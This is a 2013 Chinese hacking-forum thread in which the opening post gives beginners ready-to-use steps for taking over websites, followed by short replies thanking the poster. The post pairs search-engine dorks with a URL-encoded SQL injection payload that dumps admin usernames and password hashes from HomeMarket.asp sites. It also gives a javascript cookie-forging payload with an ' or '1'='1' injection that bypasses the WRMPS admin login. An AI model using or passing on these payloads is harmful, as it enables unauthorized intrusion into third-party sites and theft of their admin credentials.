搜索
查看: 931|回复: 7

数据漏洞拿站(非原创很多是万人骑适合新手)

[复制链接]
smallyang 该用户已被删除
发表于 2013-10-24 09:09:32 | 显示全部楼层 |阅读模式
本帖最后由 smallyang 于 2013-10-26 15:17 编辑

漏洞1
谷歌 百度   搜索关键字:inurl:"HomeMarket.asp"(用引擎搜索即可)


在域名后面加: NewsType.asp?
SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='(然后再域名后面加上这句)里面的MD5需要自己解后台用御剑扫








(漏洞2)
Powered by WRMPS(同样搜素)



admin/admin_login.asp(加域名后面)这个是后台地址



javascript:alert(document.cookie="admin=managecode="+escape("WRMPS6")+"&pass="+escape("cbi")+"&admin="+escape("admin' or '1'='1' or '1'='1")+";path=/;");  (复制放在域名上面比如www.xxx.com/XXXXXXX右键全选然后直接放进去回车)




admin/admin_manage.asp(然后域名后面再放这个回车)如果站长没做修改就直接进去了
854955425 该用户已被删除
发表于 2013-10-24 09:10:31 | 显示全部楼层
这是什么东东啊
854955425 该用户已被删除
发表于 2013-10-24 09:15:46 | 显示全部楼层
这是什么东东啊
滥情 该用户已被删除
发表于 2013-10-24 12:45:56 | 显示全部楼层
杨儿啊,你这让我..........
zeroday 该用户已被删除
发表于 2013-10-24 14:22:40 来自手机 | 显示全部楼层
潜水是一种美德,回帖是一种责任!
smallyang 该用户已被删除
 楼主| 发表于 2013-10-26 15:17:48 | 显示全部楼层
滥情 发表于 2013-10-24 12:45
杨儿啊,你这让我..........

????????
ceshi6789 该用户已被删除
发表于 2013-12-4 22:44:40 | 显示全部楼层
路过学习一下
dbzmzm 该用户已被删除
发表于 2013-12-8 08:51:15 | 显示全部楼层
谢谢楼主了,我是新手,我先使着,学习下 太感谢了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表